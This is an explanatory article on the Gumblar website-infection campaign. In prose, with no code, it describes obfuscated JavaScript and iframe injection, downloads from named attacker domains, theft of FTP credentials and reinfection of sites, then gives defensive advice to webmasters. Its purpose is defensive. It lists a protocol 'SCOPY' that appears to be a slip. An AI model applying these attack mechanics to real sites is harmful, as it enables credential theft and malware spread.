What is Gumblar Attack?

Gumblar is essentially a combination of exploit scripts and malware that collectively work together to infect and spread. The name Gumblar was given to this attack as the first series of malware were downloaded from a Chinese domain name gumblar.cn hosted on a server based in U.K. Subsequently the attacker moved to another domain name martuz.cn and started delivering the malicious payload from there. Now there are several domains hosting the malware � some 1500+, many of whom are actually innocent victims themselves.

Gumblar is a kind of code injection attack where the hacker introduces malicious code in the victim's website files. The attack happens when the computer of the website owner or administrator is compromised and used to upload malicious content to his website hosting server after gaining access to his ftp login credentials. Malicious code is embedded in html, PHP and Javascript files on the web server. So, anyone visiting the website is subjected to the risk of being attacked.

How the Gumblar attack operates?

Despite having surfaced way back in 2009, the Gumblar attack exists even today due to its continuing evolution and the manner in which it operates. Here is a simplified description of how gumblar operates.

1. A user visits a website that is infected with Gumblar. The user opens a web page that contains embedded Gumblar code. The gumblar code is essentially a base64 encoded obfuscated malicious javascript code and an iframe embed.
2. Through the embedded iframe backdoor, the malicious javascript code silently downloads a malware from the attacker's site hosted on some other server. The first such malware payload delivering site was gumblar.cn. Now there are several hundred such attacker sites. This downloaded malware finds its way into the user's computer, taking advantage of vulnerabilities in the user's computer. One of the ways in which the vulnerability was exploited was - the site sends the visitor an infected PDF that is opened by the visitor's browser or Acrobat Reader. The PDF then exploited a known vulnerability in Acrobat to gain access to the user's computer. Other means adopted include � exploiting vulnerabilities in Adobe flash player and Java runtime environment.
3. The downloaded malware now sits on the user's computer and begins the work of stealing the user's information, essentially on the look-out for FTP login credentials of website(s) that the user may own or may be administering. It may download additional malwares to aide it in the process. The malware will find FTP clients such as FileZilla and Dreamweaver and extract the stored passwords, or it may simply sit and wait for the user to login to one of his ftp accounts and grab the credentials through a key logger in the malware. This malware is also capable of hooking into several system application programming interfaces (APIs) thereby allowing it to monitor network activities and sniff for ftp credentials.
4. After the malware has gathered ftp login url, login username and password, it sends the same to a designated IP address, which is the IP address of the hacker.
5. The hacker now uses the login credentials to log into the user's website server. He downloads a copy of the victim's website files, viz. html, php, asp, aspx, js, etc., embeds them with obfuscated malicious javascript code and re-uploads them on the user's web server. Now the user's website too is infected and becomes another source of Gumblar attack. Thus it spreads and the infection cycle continues.

Why Gumblar is difficult to detect and remove?

The unique stealth mechanism of gumblar is that the malicious script that is embedded in web pages is obfuscated. Obfuscation makes it difficult for security tools or anti-virus programs to detect and analyze the malware. Further, the attacker generates obfuscated Javascript dynamically, thus embedding a different script in each infected page of the victim's website. Not only does the script vary from site to site but it can also vary from page to page on the same site, though they all deliver the same result. Since each embedded script is different, it is difficult for anti-malware software to match it with any known signature and hence difficult to detect and automatically remove.

The sites that the embedded gumblar script connects to also changes frequently, due to the very manner in which gumblar operates. Gumblar makes victim webservers as hosts for the malwares that are downloaded on victim's computer. Since new victims keep getting added as it spreads, the sites that the embedded script connects to keep changing. Further, since the victim websites are legitimate sites and known and trusted by other web visitors, the visiting users will never suspect the web pages they download from such sites and may unknowingly invoke the spread.

Needless to mention that the gumblar hacker initially targeted popular websites so as to accelerate the spread. One of the first such victim sites was Yahoo.

How to Safeguard your website from Gumblar attack?

It should be noted that the infection due to Gumblar attack is not because to any web server vulnerability. Most hosting providers do enforce stringent security measures to safeguard your data. The attack is perpetrated through stolen FTP login credentials. It transmits FTP information to the hacker's IP address, from an infected machine. This FTP information is then used to log in to the web server and infect the hosted website. So, the infection is not a server-wide exploit. It will only infect sites on the server that it has passwords to.

Given the nature and scope of this attack, it is important that proper security measures be taken at all levels to prevent it. I would like to suggest a few steps that would reduce the vulnerability of your computer and remove existing threats. Note that you will become a victim only if you are a web master who is accessing web servers via FTP. If you are a mere website visitor and do not have anything to do with uploading website files, you will be unaffected by this attack.

• Install an antivirus software with the latest updates and ensure removal of any malware, trojans or key loggers on any computer that you use to manage your website's content via FTP. Several free antivirus software like AVG, AntiVir, Malwarebytes are available for this purpose. Be careful not to download such free anti-virus software from unknown/un-trusted websites. Regular virus scans will minimize such threats to a great extent, provided you always keep virus signatures/patterns up-to-date.
• Use a genuine licensed operating system and always keep system patches up-to-date. Also, keep upgrading your browser to the latest version. Avoid trying out recently launched browsers. Always use the one that is established for years and originate from a reputed company.
• When a computer is compromised, isolate it immediately from the network. Clean it. Once you are confident that you have a clean machine then you should change all FTP passwords. It is advisable that you set complex passwords and regularly change them for added security.
• The easiest way to clean a Gumblar-infected site is by uploading a clean copy from a backup source. Note, however, that Gumblar infects random files. One missed file can thus lead to re-infection. Therefore, after changing your ftp password, delete all website files on the server and upload fresh clean files from your local backup. You must develop a habit of maintaining a clean copy of your website files in your local computer, better still in an offline storage hard disk.
• I also recommend that you avoid storing ftp passwords directly on the ftp clients that you use to upload your website pages. If multiple users have administrative rights to the FTP site, consider implementing strict password creation and renewal policies. You can further restrict ftp use by configuring your local network's firewall settings.
• Though it is probable that stolen FTP credentials are a major factor in a Gumblar attack, it is still likely that files may be infected if intercepted while in transit. Secure protocols like SFTP, FTPS, and SCOPY may be used instead of plain FTP to minimize this possibility. When transferring highly sensitive files electronically, it is advisable to use encryption technology to encrypt the files before performing any kind of transfer. Setting up a more secure method of transferring files may indeed be complicated but the added security this provides is well worth the effort.
• Periodically test your website for security issues. Also carry out vulnerability tests to check that your website codes are secured from code injection, SQL injection, and cross-site scripting (XSS) attacks.
• Avoid visiting untrustworthy websites that may redirect or download related malware onto a system.